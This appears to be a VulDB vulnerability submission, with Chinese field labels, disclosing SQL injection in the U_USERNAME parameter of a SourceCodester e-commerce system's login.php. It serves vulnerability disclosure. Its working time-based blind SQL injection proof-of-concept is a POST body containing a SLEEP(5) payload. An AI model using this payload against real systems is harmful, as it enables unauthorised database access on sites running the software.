| 标题 | E-Commerce System login.php SQL Injection Vulnerability |
|---|
| 描述 | E-Commerce System has a SQL Injection Vulnerability in its common user login function, the vulnerable URI is '/ecommerce/login.php' , and the injectable parameters is U_USERNAME
A time-based blind injection poc is below:
POST /ecommerce/login.php HTTP/1.1
***************************************
proid=1&U_USERNAME=123' AND (SELECT 6283 FROM (SELECT(SLEEP(5)))qFDz) AND 'OWHz'='OWHz&U_PASS=123&modalLogin=
Then the server will response after 5s , which proves the vul |
|---|
| 来源 | ⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html |
|---|
| 用户 | WWesleywww (UID 43117) |
|---|
| 提交 | 2023-03-20 07時53分 (3 年前) |
|---|
| 管理 | 2023-03-20 08時33分 (39 minutes later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 223410 [SourceCodester E-Commerce System 1.0 login.php U_USERNAME SQL注入] |
|---|
| 积分 | 20 |
|---|